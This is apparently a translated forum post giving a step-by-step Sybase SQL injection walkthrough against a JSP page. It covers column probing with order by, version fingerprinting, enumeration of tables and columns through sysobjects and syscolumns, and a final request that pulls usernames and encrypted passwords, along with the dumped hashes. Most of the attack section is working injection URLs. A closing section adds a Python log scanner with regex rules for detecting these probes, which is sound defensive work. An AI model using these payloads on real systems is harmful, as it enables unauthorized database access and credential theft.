While doing vulnerability testing and reporting recently I ran into a less common SQL injection point: Sybase SQL injection.
Since the Silic (习科) forum has no such case, and after looking through some Chinese sites I found no decent article on Sybase SQL injection either, I am posting it here.
After confirming the injection point, following the usual steps for a Sybase SQL injection point, we use order by to find that the table behind the page's SQL statement has 26 columns:
## Correct page
.jsp?axh=2893+order+by+26
## Error page
.jsp?axh=2893+order+by+27
The next step is a union query; here you need to watch the data types of the individual columns, as in MSSQL or PostgreSQL injection.
The 26 columns found via order by 26 may be of integer, text, date and other types, and each must be matched one by one; see this PostgreSQL injection problem summary for that.
The resulting injection statement:
showdetail.jsp?axh=2893+and+1=2+union+all+select+1,2,'c',@@version,'e',null,null,'h','i','j','k','l','m',14,'o','p','q','r','s','t','u','v','w','x','y','z'
The @@version parameter placed in display position d returns the Sybase database version:
Adaptive Server Enterprise/12.5.4/EBF 13387/P/NT (IX86)/OS 4.0/ase1254/2006/32-bit/OPT/Sat May 20 00:54:28 2006
Next, see what tables the database has:
/showdetail.jsp?axh=2893+and+1=2+union+all+select+1,2,name,@@version,'e',null,null,'h','i','j','k','l','m',14,'o','p','q','r','s','t','u','v','w','x','y','z'+from+sysobjects+where+type='U'
select name from sysobjects where type='U'
That is the statement used to view the first table. Unlike MySQL, Sybase has no group_concat() function to list all tables at once.
The first table's name is meetingpub; add a condition after where, i.e. name not equal to meetingpub:
/showdetail.jsp?axh=2893+and+1=2+union+all+select+1,2,name,@@version,'e',null,null,'h','i','j','k','l','m',14,'o','p','q','r','s','t','u','v','w','x','y','z'+from+sysobjects+where+type='U'+and+name+!='meetingpub'
This gives the second table's name: CASES_CCXS; keep adding name-not-equal conditions. Continuing in this way we get:
/showdetail.jsp?axh=2893+and+1=2+union+all+select+1,2,name,@@version,'e',null,null,'h','i','j','k','l','m',14,'o','p','q','r','s','t','u','v','w','x','y','z'+from+sysobjects+where+type='U'+and+name+!='meetingpub'+and+name+!='CASES_CCXS'+and+name+!='S_ZXRS'+and+name+!='GF_TO_EASTSOFT'+and+name+!='S_AJLBJDDY'+and+name+!='CASES2'+and+name+!='SSFYJ'
Then look at which columns the USER table has:
/showdetail.jsp?axh=2893+and+1=2+union+all+select+1,2,min(name),'','e','',null,'h','i','j','k','l','m',14,'o','p','q','r','s','t','u','v','w','x','y','z'+from+syscolumns+where+id=(select+id+from+sysobjects+where+type='U'+and+name='USER')
select min(name) from syscolumns where id=(select id from sysobjects where type='U' and name='USER')
For the second and subsequent columns, proceed as with the tables, adding name-not-equal conditions after where:
/showdetail.jsp?axh=2893+and+1=2+union+all+select+1,2,min(name),'','e','',null,'h','i','j','k','l','m',14,'o','p','q','r','s','t','u','v','w','x','y','z'+from+syscolumns+where+id=(select+id+from+sysobjects+where+type='U'+and+name='WSLA_USER')and+name!='EMAIL'and+name!='TELEPHONE'and+name!='TYPE'and+name!='USERID'and+name!='USERNAME'+--+
Finally, with the account table and column names known, read the data:
/showdetail.jsp?axh=2893+and+1=2+union+all+select+1,2,USERNAME,PASSWORD,USERID,'',null,'h','i','j','k','l','m',14,'o','p','q','r','s','t','u','v','w','x',TYPE,'z'+from+USER+where+USERNAME='19990909'
The encrypted PASSWORD data:
9C995A7E5P97955P5279
54775E7A727P7P775A7P
9EE37ASES1S9EPE32996
47S8S4S249S845S24561
Also: if there are many tables and columns, there are actually other ways.
The original author adds: you can use 'pass' or similar to directly match the table where the user data lives.
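From the defender's side, the sequence above (order by probing, a union all select carrying @@version, then walks over sysobjects/syscolumns) is very visible in web server access logs. The following is an added example, not code from the original post: a small Python scanner that flags those patterns per client IP; the log lines are constructed and the rule names are my own.

```python
import re
from urllib.parse import unquote_plus
# Constructed sample access-log lines (not taken from the page): one benign request,
# the column-count probes, the version probe and a catalog-enumeration request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /showdetail.jsp?axh=2893 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /showdetail.jsp?axh=2893+order+by+26 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /showdetail.jsp?axh=2893+order+by+27 HTTP/1.1" 500 312
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /showdetail.jsp?axh=2893+and+1=2+union+all+select+1,2,'c',@@version,'e',null,null,'h' HTTP/1.1" 200 5300
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /showdetail.jsp?axh=2893+and+1=2+union+all+select+1,2,name,@@version+from+sysobjects+where+type='U' HTTP/1.1" 200 5300
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /showdetail.jsp?axh=1234 HTTP/1.1" 200 5120
"""
# Common-log-format prefix: client IP, two dash fields, [timestamp], "METHOD path"
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<path>\S+)')

# Rules matched against the decoded query string; the names are my own labels.
RULES = [
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),         # column-count probing
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),  # union-based extraction
    ("sybase_version", re.compile(r"@@version", re.I)),                   # server fingerprint
    ("catalog_enum", re.compile(r"\bsys(objects|columns)\b", re.I)),      # table/column enumeration
]

def decode_query(path):
    """Return the URL-decoded query string of a request path ('' if none); '+' becomes a space."""
    if "?" not in path:
        return ""
    return unquote_plus(path.split("?", 1)[1])

def scan_line(line):
    """Parse one access-log line; return (ip, [matched rule names]) or None if unparsable."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    query = decode_query(m.group("path"))
    return m.group("ip"), [name for name, rx in RULES if rx.search(query)]

def scan_log(text):
    """Aggregate matched rules per client IP over a whole log; IPs with no hits are omitted."""
    findings = {}
    for line in text.splitlines():
        parsed = scan_line(line)
        if parsed and parsed[1]:
            findings.setdefault(parsed[0], set()).update(parsed[1])
    return {ip: sorted(rules) for ip, rules in findings.items()}

if __name__ == "__main__":
    for ip, rules in scan_log(SAMPLE_LOG).items():
        print(f"{ip}: {', '.join(rules)}")
```

A single IP tripping several of these rules in quick succession is the signature worth alerting on; the decoding step matters because the probes arrive with '+' and percent-encoding, not as readable SQL.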